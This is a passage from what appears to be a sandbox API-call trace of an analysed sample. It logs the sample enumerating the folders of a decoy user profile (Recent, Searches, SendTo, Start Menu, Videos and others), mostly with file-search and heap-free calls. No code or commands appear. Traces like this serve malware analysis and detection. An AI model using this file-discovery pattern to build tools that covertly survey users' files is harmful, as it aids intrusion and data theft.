cFileName="YmeGoElpXFQt.bmp", cAlternateFileName="YMEGOE~1.BMP")) returned 1 [0142.998] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59382570, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0x7e0b5f40, ftLastAccessTime.dwHighDateTime=0x1d5dfca, ftLastWriteTime.dwLowDateTime=0x7e0b5f40, ftLastWriteTime.dwHighDateTime=0x1d5dfca, nFileSizeHigh=0x0, nFileSizeLow=0x30ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YmeGoElpXFQt.bmp", cAlternateFileName="YMEGOE~1.BMP")) returned 0 [0142.998] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.998] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0142.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.998] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.998] PathFindFileNameW (pszPath="") returned="" [0142.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59382570, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0x7e0b5f40, ftLastAccessTime.dwHighDateTime=0x1d5dfca, ftLastWriteTime.dwLowDateTime=0x7e0b5f40, ftLastWriteTime.dwHighDateTime=0x1d5dfca, nFileSizeHigh=0x0, nFileSizeLow=0x30ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YmeGoElpXFQt.bmp", cAlternateFileName="YMEGOE~1.BMP")) returned 0xffffffff [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.998] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0142.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.998] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.999] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.999] PathFindFileNameW (pszPath="") returned="" [0142.999] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59382570, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0x7e0b5f40, ftLastAccessTime.dwHighDateTime=0x1d5dfca, ftLastWriteTime.dwLowDateTime=0x7e0b5f40, ftLastWriteTime.dwHighDateTime=0x1d5dfca, nFileSizeHigh=0x0, nFileSizeLow=0x30ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YmeGoElpXFQt.bmp", cAlternateFileName="YMEGOE~1.BMP")) returned 0xffffffff [0142.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.999] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0142.999] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.999] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.999] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.999] PathFindFileNameW (pszPath="") returned="" [0142.999] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.999] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.999] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0143.000] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0143.000] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.000] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0143.000] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.000] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.000] PathFindFileNameW (pszPath="") returned="" [0143.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0143.000] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0143.000] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0143.001] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.001] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0143.001] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.001] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.001] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.001] PathFindFileNameW (pszPath="") returned="" [0143.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0143.001] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.001] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0143.001] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.001] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.001] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.001] PathFindFileNameW (pszPath="") returned="" [0143.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0143.002] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.002] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0143.002] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.002] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.002] PathFindFileNameW (pszPath="") returned="" [0143.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0143.002] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.002] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0143.002] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.002] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.002] PathFindFileNameW (pszPath="") returned="" [0143.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfebe960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfebe960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfebe960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfebe960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc959460, ftCreationTime.dwHighDateTime=0x1d5d83e, ftLastAccessTime.dwLowDateTime=0xc580b370, ftLastAccessTime.dwHighDateTime=0x1d5e63c, ftLastWriteTime.dwLowDateTime=0xc580b370, ftLastWriteTime.dwHighDateTime=0x1d5e63c, nFileSizeHigh=0x0, nFileSizeLow=0x12fec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2NY4a9USEF rp-RJZh.swf", cAlternateFileName="2NY4A9~1.SWF")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e7feb40, ftCreationTime.dwHighDateTime=0x1d5d87e, ftLastAccessTime.dwLowDateTime=0xa0f3ab60, ftLastAccessTime.dwHighDateTime=0x1d5dd55, ftLastWriteTime.dwLowDateTime=0xa0f3ab60, ftLastWriteTime.dwHighDateTime=0x1d5dd55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lcr-oiAsOX3Khc", cAlternateFileName="LCR-OI~1")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5abef90, ftCreationTime.dwHighDateTime=0x1d5e051, ftLastAccessTime.dwLowDateTime=0x46a4db40, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x46a4db40, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QD4HLV", cAlternateFileName="")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b3370, ftCreationTime.dwHighDateTime=0x1d5d95f, ftLastAccessTime.dwLowDateTime=0x38e04e40, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x38e04e40, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x176c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U8UJ9l.mp4", cAlternateFileName="")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd02ab730, ftCreationTime.dwHighDateTime=0x1d5dea8, ftLastAccessTime.dwLowDateTime=0xf96f9510, ftLastAccessTime.dwHighDateTime=0x1d5e007, ftLastWriteTime.dwLowDateTime=0xf96f9510, ftLastWriteTime.dwHighDateTime=0x1d5e007, nFileSizeHigh=0x0, nFileSizeLow=0xaed4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vDDQKFTF8F7Hp.mp4", cAlternateFileName="VDDQKF~1.MP4")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd582f7e0, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0x2d8d3800, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x2d8d3800, ftLastWriteTime.dwHighDateTime=0x1d5e7ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxpMGUtHr3G-", cAlternateFileName="XXPMGU~1")) returned 1 [0143.003] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd582f7e0, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0x2d8d3800, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x2d8d3800, ftLastWriteTime.dwHighDateTime=0x1d5e7ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XxpMGUtHr3G-", cAlternateFileName="XXPMGU~1")) returned 0 [0143.003] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b560 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c6c8 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d068 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b4f8 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b768 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b7d0 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0143.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b838 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac51b0 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b8a0 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac5208 | out: hHeap=0x620000) returned 1 [0143.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac5260 | out: hHeap=0x620000) 